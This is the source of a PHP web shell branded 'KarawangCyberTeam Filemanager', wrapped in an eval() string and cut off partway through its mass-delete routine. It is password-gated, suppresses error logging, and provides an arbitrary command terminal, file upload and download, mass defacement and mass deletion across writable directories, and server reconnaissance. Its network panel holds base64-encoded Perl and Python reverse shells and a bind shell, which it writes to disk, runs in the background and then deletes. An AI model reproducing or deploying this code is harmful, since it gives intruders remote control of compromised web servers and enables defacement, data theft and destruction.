eval("?><?php\r\n/* want to recode? can. and don't forget to credit the author :) */\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n@ini_set('error_log',null);\r\n@ini_set('log_errors',0);\r\n@ini_set('max_execution_time',0);\r\n@ini_set('output_buffering',0);\r\n@ini_set('display_errors', 0);\r\nsession_start();\r\ndate_default_timezone_set(\"Asia/Jakarta\");\r\n\$nana = array_merge(\$_POST, \$_GET);\r\n\$pwd = \"kontoll471\"; // password\r\nif(empty(\$_SESSION['login'])) {\r\n?>\r\n<html>\r\n\t<head>\r\n\t\t<meta charset=\"UTF-8\">\r\n\t\t<meta name=\"viewport\" content=\"width=device-width, initial-scale=1, user-scalable=no\">\r\n\t\t<title><?=\$_SERVER['HTTP_HOST'];?> login filemanager V.0.1</title>\r\n\t\t<link rel=\"stylesheet\" href=\"//unknownsec.ftp.sh/main/style-fm.css\">\r\n\t\t<script src=\"//cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js\"></script>\r\n\t</head>\r\n<body class=\"bg-secondary text-light\">\r\n<div class=\"container-fluid\">\r\n\t<div class=\"py-3\" id=\"main\">\r\n\t\t<div class=\"box shadow bg-dark p-4 rounded-3\">\r\n\t\t\t<form method=\"post\">\r\n\t\t\t\t<i class=\"bi bi-display\"></i> Login Filemanager V.0.1</u>\r\n<?php\r\nif(\$nana['pwd']) {\r\n\tif(\$nana['pwd'] == \$pwd) {\r\n\t\t\$_SESSION['login'] = \"login\";\r\nprint '<strong>Login</strong> ok! '.alt_ok().'<a class=\"btn-close\" href=\"'.\$_SERVER['PHP_SELF'].'\"></a></div>';\r\n\t\t} else { \r\nprint '<strong>Login</strong> fail! '.alt_fail().'</div>';\r\n\t}\r\n}\r\n?>\r\n\t\t\t\t<div class=\"input-group mb-3\">\r\n\t\t\t\t<div class=\"input-group-text\"><i class=\"bi bi-terminal\"></i></div>\r\n\t\t\t\t\t<input class=\"form-control form-control-sm\" type=\"password\" name=\"pwd\" placeholder=\"Password\" required=\"required\">\r\n\t\t\t\t</div>\r\n\t\t\t</form>\r\n\t\t<div class=\"text-secondary\">© <?=date(\"Y\");?> ./KarawangCyberTeam</div>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n</body>\r\n</html>\r\n<?php\r\nexit();\r\n}\r\n// logout\r\nif(isset(\$nana[\"left\"])) {\r\n\tsession_start();\r\n\tsession_destroy();\r\n\tprint '<script>window.location=\"'.\$_SERVER['PHP_SELF'].'\";</script>';\r\n}\r\n// download file\r\nif(isset(\$nana['opn']) && (\$nana['opn'] != '') && (\$nana['action'] == 'download')){\r\n\t@ob_clean();\r\n\t\$file = \$nana['opn'];\r\n\theader('Content-Description: File Transfer');\r\n\theader('Content-Type: application/octet-stream');\r\n\theader('Content-Disposition: attachment; filename=\"'.basename(\$file).'\"');\r\n\theader('Expires: 0');\r\n\theader('Cache-Control: must-revalidate');\r\n\theader('Pragma: public');\r\n\theader('Content-Length: ' . filesize(\$file));\r\n\treadfile(\$file);\r\n\texit;\r\n}\r\nfunction w(\$dir,\$perm) {\r\n\tif(!is_writable(\$dir)) {\r\n\t\treturn \"<rd>\".\$perm.\"</rd>\";\r\n\t} else {\r\n\t\treturn \"<cmd>\".\$perm.\"</cmd>\";\r\n\t}\r\n}\r\nfunction s(){\r\n\tprint '<style>table{display:none;}</style><br>';\r\n}\r\nfunction alt_ok(){\r\n\tprint '<div class=\"alert alert-success alert-dismissible fade show my-3\" role=\"alert\"><button type=\"button\" class=\"btn-close\" data-bs-dismiss=\"alert\" aria-label=\"Close\"></button>';\r\n}\r\nfunction alt_fail(){\r\n\tprint '<div class=\"alert alert-danger alert-dismissible fade show my-3\" role=\"alert\"><button type=\"button\" class=\"btn-close\" data-bs-dismiss=\"alert\" aria-label=\"Close\"></button>';\r\n}\r\nfunction op(\$d, \$e) {\r\n\t\$fp = fopen(\$d, \"w\");\r\n\t\$ch = curl_init();\r\n\tcurl_setopt(\$ch, CURLOPT_URL, \$e);\r\n\tcurl_setopt(\$ch, CURLOPT_BINARYTRANSFER, true);\r\n\tcurl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);\r\n\tcurl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, false);\r\n\tcurl_setopt(\$ch, CURLOPT_SSL_VERIFYHOST, false);\r\n\tcurl_setopt(\$ch, CURLOPT_FILE, \$fp);\r\n\treturn curl_exec(\$ch);\r\n\tcurl_close(\$ch);\r\n\tfclose(\$fp);\r\n\tob_flush();\r\n\tflush();\r\n}\r\nfunction sz(\$byt){\r\n\t\$typ = array('B', 'KB', 'MB', 'GB', 'TB');\r\n\tfor(\$i = 0; \$byt >= 1024 && \$i < (count(\$typ) -1 ); \$byt /= 1024, \$i++ );\r\n\treturn(round(\$byt,2).\" \".\$typ[\$i]);\r\n}\r\nfunction ia() {\r\n\t\$ia = '';\r\nif (getenv('HTTP_CLIENT_IP'))\r\n\t\$ia = getenv('HTTP_CLIENT_IP');\r\nelse if(getenv('HTTP_X_FORWARDED_FOR'))\r\n\t\$ia = getenv('HTTP_X_FORWARDED_FOR');\r\nelse if(getenv('HTTP_X_FORWARDED'))\r\n\t\$ia = getenv('HTTP_X_FORWARDED');\r\nelse if(getenv('HTTP_FORWARDED_FOR'))\r\n\t\$ia = getenv('HTTP_FORWARDED_FOR');\r\nelse if(getenv('HTTP_FORWARDED'))\r\n\t\$ia = getenv('HTTP_FORWARDED');\r\nelse if(getenv('REMOTE_ADDR'))\r\n\t\$ia = getenv('REMOTE_ADDR');\r\nelse\r\n\t\$ia = 'S4dboy IP.';\r\nreturn \$ia;\r\n}\r\nfunction exe(\$cmd) {\r\nif(function_exists('system')) {\r\n\t@ob_start();\r\n\t@system(\$cmd);\r\n\t\$buff = @ob_get_contents();\r\n\t@ob_end_clean();\r\n\treturn \$buff;\r\n} elseif(function_exists('exec')) {\r\n\t@exec(\$cmd,\$results);\r\n\t\$buff = \"\";\r\nforeach(\$results as \$result) {\r\n\t\$buff .= \$result;\r\n\t} return \$buff;\r\n} elseif(function_exists('passthru')) {\r\n\t@ob_start();\r\n\t@passthru(\$cmd);\r\n\t\$buff = @ob_get_contents();\r\n\t@ob_end_clean();\r\n\treturn \$buff;\r\n} elseif(function_exists('shell_exec')) {\r\n\t\$buff = @shell_exec(\$cmd);\r\n\treturn \$buff;\r\n\t}\r\n}\r\nfunction p(\$file){\r\n\$p = fileperms(\$file);\r\nif ((\$p & 0xC000) == 0xC000) {\r\n\$i = 's';\r\n} elseif ((\$p & 0xA000) == 0xA000) {\r\n\$i = 'l';\r\n} elseif ((\$p & 0x8000) == 0x8000) {\r\n\$i = '-';\r\n} elseif ((\$p & 0x6000) == 0x6000) {\r\n\$i = 'b';\r\n} elseif ((\$p & 0x4000) == 0x4000) {\r\n\$i = 'd';\r\n} elseif ((\$p & 0x2000) == 0x2000) {\r\n\$i = 'c';\r\n} elseif ((\$p & 0x1000) == 0x1000) {\r\n\$i = 'p';\r\n} else {\r\n\$i = 'u';\r\n\t}\r\n\$i .= ((\$p & 0x0100) ? 'r' : '-');\r\n\$i .= ((\$p & 0x0080) ? 'w' : '-');\r\n\$i .= ((\$p & 0x0040) ?\r\n((\$p & 0x0800) ? 's' : 'x' ) :\r\n((\$p & 0x0800) ? 'S' : '-'));\r\n\$i .= ((\$p & 0x0020) ? 'r' : '-');\r\n\$i .= ((\$p & 0x0010) ? 'w' : '-');\r\n\$i .= ((\$p & 0x0008) ?\r\n((\$p & 0x0400) ? 's' : 'x' ) :\r\n((\$p & 0x0400) ? 'S' : '-'));\r\n\$i .= ((\$p & 0x0004) ? 'r' : '-');\r\n\$i .= ((\$p & 0x0002) ? 'w' : '-');\r\n\$i .= ((\$p & 0x0001) ?\r\n((\$p & 0x0200) ? 't' : 'x' ) :\r\n((\$p & 0x0200) ? 'T' : '-'));\r\nreturn \$i;\r\n}\r\nif(isset(\$nana['path'])){\r\n\t\$path = \$nana['path'];\r\n\tchdir(\$path);\r\n}else{\r\n\t\$path = getcwd();\r\n}\r\n\$path = str_replace('\\\\','/',\$path);\r\n\$paths = explode('/',\$path);\r\nif(isset(\$nana['dir'])) {\r\n\t\$dir = \$nana['dir'];\r\n\tchdir(\$dir);\r\n} else {\r\n\t\$dir = getcwd();\r\n}\r\nprint \"\r\n<html>\r\n\t<head>\r\n\t\t<meta charset='UTF-8'>\r\n\t\t<meta name='author' content='KarawangCyberTeam'>\r\n\t\t<meta name='viewport' content='width=device-width, initial-scale=1, user-scalable=no'>\r\n\t\t<title>\".\$_SERVER[\"HTTP_HOST\"].\" File Manager</title>\r\n\t\t<link rel='stylesheet' href='//unknownsec.ftp.sh/main/@css_fm.css'>\r\n\t\t<script src='//cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js'></script>\r\n\t\t<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>\r\n\t</head>\r\n<script type='text/javascript'>baseUrl = window.location.href.split('?')[0]; window.history.pushState('name', '?', baseUrl);</script>\r\n<script type='text/javascript'>\r\nfunction c(x) {\r\n\twindow.location = x\r\n}\r\n</script>\r\n<body class='bg-secondary text-light'>\r\n<div class='container-fluid'>\r\n\t<div class='py-3' id='main'>\r\n\t\t<div class='box shadow bg-dark p-4 rounded-3'>\r\n\t\t\t<a class='text-decoration-none text-light' href='\".\$_SERVER['PHP_SELF'].\"'><h4>KarawangCyberTeam Filemanager</h4></a>\";\r\n\t\t\tif(isset(\$nana['path'])){\r\n\t\t\t\t\$path = \$nana['path'];\r\n\t\t\t\tchdir(\$path);\r\n\t\t\t}else{\r\n\t\t\t\t\$path = getcwd();\r\n\t\t\t}\r\n\t\t\t\t\$path = str_replace('\\\\','/',\$path);\r\n\t\t\t\t\$paths = explode('/',\$path);\r\n\t\t\tforeach(\$paths as \$id=>\$pat){\r\n\t\t\tif(\$pat == '' && \$id == 0){\r\n\t\t\t\t\$a = true;\r\n\t\t\t\t\tprint \"<i class='bi bi-hdd-rack'></i>:<a class='text-decoration-none text-light' onclick='c(\\\"?path=/\\\")'>/</a>\";\r\n\t\t\t\tcontinue;\r\n\t\t\t}\r\n\tif(\$pat == '') continue;\r\n\t\tprint \"<a class='text-decoration-none' onclick='c(\\\"?path=\";\r\n\t\tfor(\$i=0;\$i<=\$id;\$i++){\r\n\t\tprint \"\$paths[\$i]\";\r\n\tif(\$i != \$id) print \"/\";\r\n\t}\r\nprint \"\\\")'>\".\$pat.\"</a>/\";\r\n\t}\r\n\t\$scand = scandir(\$path);\r\n\tprint \" [ \".w(\$path, p(\$path)).\" ]\";\r\nprint \"\r\n<div class='center'>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"\".\$_SERVER['PHP_SELF'].\"\\\")'><i class='bi bi-house'></i> Home</a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&id=upload\\\")'><i class='bi bi-upload'></i> Upload</a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&id=deface\\\")'><i class='bi bi-exclamation-diamond'></i> Mass depes</a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&id=delete\\\")'><i class='bi bi-trash'></i> Mass delete</a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&id=cmd\\\")'><i class='bi bi-terminal'></i> Terminal</a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&id=jumping\\\")'><i class='bi bi-exclamation-triangle'></i> Jumping</a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&id=network\\\")'><i class='bi bi-hdd-network'></i> Network</a>\r\n\t<br>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&id=zip\\\")'><i class='bi bi-file-earmark-zip'></i> Zip & Unzip</a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&id=info\\\")'><i class='bi bi-info-circle'></i> Info server</a>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?dir=\$path&id=about\\\")'><i class='bi bi-info'></i> About</a></h5>\r\n\t<a class='btn btn-outline-light btn-sm' onclick='c(\\\"?left\\\")'><i class='bi bi-box-arrow-in-left'></i> Logout</a>\r\n</div>\";\r\n// tools filemanager\r\nif(isset(\$nana['dir'])) {\r\n\t\$dir = \$nana['dir'];\r\n\tchdir(\$dir);\r\n} else {\r\n\t\$dir = getcwd();\r\n}\r\n\$dir = str_replace(\"\\\\\",\"/\",\$dir);\r\n\$scdir = explode(\"/\", \$dir);\t\r\nfor(\$i = 0; \$i <= \$c_dir; \$i++) {\r\n\t\$scdir[\$i];\r\n\tif(\$i != \$c_dir) {\r\n}\r\n// mass deface #Karawang Cyber Team\r\nif(\$nana['id'] == 'deface'){\r\n\tfunction mass_kabeh(\$dir,\$namafile,\$isi_script) {\r\n\tif(is_writable(\$dir)) {\r\n\t\t\$dira = scandir(\$dir);\r\n\t\tforeach(\$dira as \$dirb) {\r\n\t\t\t\$dirc = \"\$dir/\$dirb\";\r\n\t\t\t\$\xe2\x96\x9a = \$dirc.'/'.\$namafile;\r\n\t\t\tif(\$dirb === '.') {\r\n\t\t\t\tfile_put_contents(\$\xe2\x96\x9a, \$isi_script);\r\n\t\t\t} elseif(\$dirb === '..') {\r\n\t\t\t\tfile_put_contents(\$\xe2\x96\x9a, \$isi_script);\r\n\t\t\t} else {\r\n\t\t\t\tif(is_dir(\$dirc)) {\r\n\t\t\t\t\tif(is_writable(\$dirc)) {\r\n\t\t\t\t\t\tprint \"<pre>[<cmd>success</cmd>] \$\xe2\x96\x9a</pre>\";\r\n\t\t\t\t\t\tfile_put_contents(\$\xe2\x96\x9a, \$isi_script);\r\n\t\t\t\t\t\t\$\xe2\x96\x9f = mass_kabeh(\$dirc,\$namafile,\$isi_script);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nfunction mass_biasa(\$dir,\$namafile,\$isi_script) {\r\n\tif(is_writable(\$dir)) {\r\n\t\t\$dira = scandir(\$dir);\r\n\t\tforeach(\$dira as \$dirb) {\r\n\t\t\t\$dirc = \"\$dir/\$dirb\";\r\n\t\t\t\$\xe2\x96\x9a = \$dirc.'/'.\$namafile;\r\n\t\t\tif(\$dirb === '.') {\r\n\t\t\t\tfile_put_contents(\$\xe2\x96\x9a, \$isi_script);\r\n\t\t\t} elseif(\$dirb === '..') {\r\n\t\t\t\tfile_put_contents(\$\xe2\x96\x9a, \$isi_script);\r\n\t\t\t} else {\r\n\t\t\t\tif(is_dir(\$dirc)) {\r\n\t\t\t\t\tif(is_writable(\$dirc)) {\r\n\t\t\t\t\t\tprint \"<pre>[<cmd>success</cmd>] \$dirb/\$namafile</pre>\";\r\n\t\t\t\t\t\tfile_put_contents(\$\xe2\x96\x9a, \$isi_script);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}\r\nif(\$nana['start']) {\r\n\tif(\$nana['tipe'] == 'massal') {\r\n\t\tprint \"<div style='margin: 5px auto; padding: 5px'>\";\r\n\tmass_kabeh(\$nana['d_dir'], \$nana['d_file'], \$nana['script']);\r\n\t\tprint \"</div>\";\r\n\t} elseif(\$nana['tipe'] == 'biasa') {\r\n\t\tprint \"<div style='margin: 5px auto; padding: 5px'>\";\r\n\tmass_biasa(\$nana['d_dir'], \$nana['d_file'], \$nana['script']);\r\n\t\tprint \"</div>\";\r\n\t}\r\n} else {\r\ns();\r\nprint \"\r\n<form action='?dir=\$path&id=deface' method='POST'>\r\n\t<b>Tipe:</b><br>\r\n<div class='custom-control custom-switch'>\r\n\t<input class='custom-control-input' type='checkbox' id='customSwitch' name='tipe' value='biasa'>\r\n\t<label class='custom-control-label' for='customSwitch'>Biasa</label>\r\n</div>\r\n<div class='custom-control custom-switch'>\r\n\t<input class='custom-control-input' type='checkbox' id='customSwitch1' name='tipe' value='massal'>\r\n\t<label class='custom-control-label' for='customSwitch1'>Massal</label>\r\n</div>\r\n\t<b><i class='bi bi-folder'></i> Directory:</b>\r\n\t<input class='form-control btn-sm' type='text' name='d_dir' value='\$dir' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> File name:</b>\r\n\t<input class='form-control btn-sm' type='text' name='d_file' placeholder='name file' height='10'>\r\n\t<b><i class='bi bi-file-earmark'></i> Your script:</b>\r\n\t<textarea class='form-control btn-sm' rows='7' name='script' placeholder='your secript here'></textarea><br />\r\n\t<input class='btn btn-outline-light btn-sm btn-block' type='submit' name='start' value='submit' >\r\n</form>\";\r\n\t}\r\n}\r\n// info\r\nif(\$nana['id'] == 'info'){\r\n\$sql = (function_exists('mysql_connect')) ? \"<cmd>ON</cmd>\" : \"<rd>OFF</rd>\";\r\n\$curl = (function_exists('curl_version')) ? \"<cmd>ON</cmd>\" : \"<rd>OFF</rd>\";\r\n\$wget = (exe('wget --help')) ? \"<cmd>ON</cmd>\" : \"<rd>OFF</rd>\";\r\n\$pl = (exe('perl --help')) ? \"<cmd>ON</cmd>\" : \"<rd>OFF</rd>\";\r\n\$py = (exe('python --help')) ? \"<cmd>ON</cmd>\" : \"<rd>OFF</rd>\";\r\n\$disfunc = @ini_get(\"disable_functions\");\r\nif (empty(\$disfunc)) {\r\n\t\$disfc = \"<cmd>NONE</cmd>\";\r\n} else {\r\n\t\$disfc = \"<rd>\$disfunc</rd>\";\r\n}\r\nif(!function_exists('posix_getegid')) {\r\n\t\$user = @get_current_user();\r\n\t\$uid = @getmyuid();\r\n\t\$gid = @getmygid();\r\n\t\$group = \"?\";\r\n} else {\r\n\t\$uid = @posix_getpwuid(posix_geteuid());\r\n\t\$gid = @posix_getgrgid(posix_getegid());\r\n\t\$user = \$uid['name'];\r\n\t\$uid = \$uid['uid'];\r\n\t\$group = \$gid['name'];\r\n\t\$gid = \$gid['gid'];\r\n}\r\n\$sm = (@ini_get(strtolower(\"safe_mode\")) == 'on') ? \"<rd>ON</rd>\" : \"<cmd>OFF</cmd>\";\r\ns();\r\nprint \"\r\n<div class='container'>\r\n\t<div class='card text-dark'>\r\n\t\t<div class='card-header'>\r\nUname: <cmd>\".php_uname().\"</cmd><br>\r\nSoftware: <cmd>\".\$_SERVER[\"SERVER_SOFTWARE\"].\"</cmd><br>\r\nPHP version: <cmd>\".PHP_VERSION.\"</cmd> <a class='text-decoration-none' onclick='c(\\\"?dir=\$path&id=phpinfo\\\")'>[ PHPINFO ]</a> PHP os: <cmd>\".PHP_OS.\"</cmd><br>\r\nServer Ip: <cmd>\".gethostbyname(\$_SERVER['HTTP_HOST']).\"</cmd><br>\r\nYour Ip: <cmd>\".ia().\"</cmd><br>\r\nUser: <cmd>\$user</cmd> (\$uid) | Group: <cmd>\$group</cmd> (\$gid)<br>\r\nSafe Mode: \$sm<br>\r\nMySQL: \$sql | Perl: \$pl | Python: \$py | WGET: \$wget | CURL: \$curl<br>\r\nDisable Function:<br><pre>\$disfc</pre>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<br/>\";\r\n}\r\n// phpinfo \r\nif(\$nana['id'] == 'phpinfo'){\r\n\t@ob_start();\r\n\t@eval(\"phpinfo();\");\r\n\t\$buff = @ob_get_contents();\r\n\t@ob_end_clean();\t\r\n\t\$awal = strpos(\$buff,\"<body>\")+6;\r\n\t\$akhir = strpos(\$buff,\"</body>\");\r\n\tprint \"<pre class='php_info'>\".substr(\$buff,\$awal,\$akhir-\$awal).\"</pre>\";\r\n\texit;\r\n}\r\nif(\$nana['id'] == 'about'){\r\ns();\r\nprint \"\r\n<div class='container'>\r\n\t<div class='card text-dark'>\r\n\t\t<div class='card-header'>\r\n\t\t\t<img class='img-thumbnail rounded mx-auto d-block' alt='KarawangCyberTeam' src='https://i.ibb.co/gygBGtw/20220422-004641.png' width='150px'>\r\n\t\t\t<b>- About Me -</b>\r\n\t\t\t<br/>Thank bro, for using my shell, if there is an error, please contact the email below.<br />Greetz : <u>{ Karawang Cyber Team } - And You</u><br/>My email: <a class='text-decoration-none' href=melepaskanmu45@gmail.com'>melepaskanmu45@gmail.com</a>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<br/>\";\r\n}\r\n// network\r\nif(\$nana['id'] == 'network'){\r\ns();\r\n\tprint \"\r\n<h4>Back Connect Tools</h4>\r\n<form action='?dir=\$path&id=network' method='post'>\r\n\t<u>Bind port to /bin/sh [Perl]</u><br>\r\n\t<u>Port :</u>\r\n\t<div class='input-group'>\r\n\t\t<input class='form-control btn-sm' type='text' name='port' placeholder='6969'>\r\n\t\t<input class='btn btn-outline-light btn-sm' type='submit' name='bpl' value='submit'>\r\n\t</div>\r\n<h5>Back-Connect</h5>\r\n\t<u>Server :</u>\r\n\t\t<input class='form-control btn-sm' type='text' name='server' placeholder='\". \$_SERVER['REMOTE_ADDR'] .\"'>\r\n\t<u>Port :</u>\r\n\t<div class='input-group'>\r\n\t\t<input class='form-control btn-sm' type='text' name='port' placeholder='6969'>\r\n\t\t<select class='form-control btn-sm' name='bc'>\r\n\t\t\t<option value='perl'>perl</option>\r\n\t\t\t<option value='python'>python</option>\r\n\t\t</select>\r\n\t</div>\r\n<input class='btn btn-outline-light btn-block btn-sm' type='submit' value='submit'>\r\n</form>\";\r\nif(\$_POST['bpl']){\r\n\t\$bp = base64_decode(\"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=\");\r\n\t\$brt = @fopen('bp.pl','w');\r\n\tfwrite(\$brt,\$bp);\r\n\t\$out = exe(\"perl bp.pl \".\$_POST['port'].\" 1>/dev/null 2>&1 &\");\r\n\tsleep(1);\r\n\techo \"<pre class='pre'>\$out\\n\".exe(\"ps aux | grep bp.pl\").\"</pre>\";\r\n\tunlink(\"bp.pl\");\r\n}\r\nif(\$_POST['bc'] == 'perl'){\r\n\t\$bc = base64_decode(\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7\");\r\n\t\$plbc = @fopen('bc.pl','w');\r\n\tfwrite(\$plbc,\$bc);\r\n\t\$out = exe(\"perl bc.pl \".\$_POST['server'].\" \".\$_POST['port'].\" 1>/dev/null 2>&1 &\");\r\n\tsleep(1);\r\n\tprint \"<pre class='pre'>\$out\\n\".exe(\"ps aux | grep bc.pl\").\"</pre>\";\r\n\tunlink(\"bc.pl\");\r\n}\r\nif(\$_POST['bc'] == 'python'){\r\n\t\$bc_py = base64_decode(\"IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=\");\r\n\t\$pbc_py = @fopen('bcpy.py','w');\r\n\tfwrite(\$pbc_py,\$bc_py);\r\n\t\$out_py = exe(\"python bcpy.py \".\$_POST['server'].\" \".\$_POST['port']);\r\n\tsleep(1);\r\n\tprint \"<pre class='pre'>\$out_py\\n\".exe(\"ps aux | grep bcpy.py\").\"</pre>\";\r\n\tunlink(\"bcpy.py\");\r\n\t}\r\n}\r\n// phpinfo \r\nif(\$nana['id'] == 'phpinfo'){\r\n\t@ob_start();\r\n\t@eval(\"phpinfo();\");\r\n\t\$buff = @ob_get_contents();\r\n\t@ob_end_clean();\t\r\n\t\$awal = strpos(\$buff,\"<body>\")+6;\r\n\t\$akhir = strpos(\$buff,\"</body>\");\r\n\tprint \"<pre class='php_info'>\".substr(\$buff,\$awal,\$akhir-\$awal).\"</pre>\";\r\n\texit;\r\n}\r\n// cmd\r\nif(\$nana['id'] == 'cmd') {\r\ns();\r\nif(\$nana['ekseCMD']) {\r\n\$result = \$nana['ekseCMD'];\r\nprint \"<div class='shell bg-dark'>\r\n<pre class='pre text-light'><b>KarawangCyberTeam<cmd>@</cmd>cmd#:~</b> <cmd>\$result</cmd><br>\";\r\n\tsystem(\$nana['ekseCMD'].' 2>&1');\r\n\tprint \"</pre></div>\";\r\n}\r\nprint \"\r\n<form action='?dir=\$path&id=cmd' method='POST'>\r\n\t<div class='input-group'>\r\n\t\t<div class='input-group-text'><i class='bi bi-terminal'></i></div><input class='form-control form-control-sm' type='text' name='ekseCMD' value='\$result'>\r\n\t</div>\r\n</form>\";\r\n// upload\r\n} if(\$nana['id'] == 'upload'){\r\nif(isset(\$_FILES['file'])){\r\nif(copy(\$_FILES['file']['tmp_name'],\$dir.'/'.\$_FILES['file']['name'])){\r\nprint '<strong>Upload</strong> ok! '.alt_ok().'</div>';\r\n}else{\r\nprint '<strong>Upload</strong> fail! '.alt_fail().'</div>';\r\n}\r\n\t}\r\ns();\r\nprint \"\r\n<form action='?dir=\$path&id=upload' method='POST' enctype='multipart/form-data'>\r\n\t<div class='input-group mb-3'>\r\n\t\t<input class='form-control form-control-sm' type='file' name='file'>\r\n\t\t<button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button>\r\n\t</div>\r\n</form>\";\r\n}\r\n// mass delete #indoxploit\r\nif(\$nana['id'] == 'delete'){\r\nfunction hapus_massal(\$dir,\$namafile) {\r\n\tif(is_writable(\$dir)) {\r\n\t\t\$dira = scandir(\$dir);\r\n\t\tforeach(\$dira as \$dirb) {\r\n\t\t\t\$dirc = \"\$dir/\$dirb\";\r\n\t\t\t\$\xe2\x96\x9a = \$dirc.'/'.\$namafile;\r\n\t\t\tif(\$dirb === '.') {\r\n\t\t\t\tif(file_exists(\"\$dir/\$namafile\")) {\r\n\t\t\t\t\tunlink(\"\$dir/\$namafile\");\r\n\t\t\t\t}\r\n\t\t\t} elseif(\$dirb === '..') {\r\n\t\t\t\tif(file_exists(\"\".dirname(\$dir).\"/\$namafile\")) 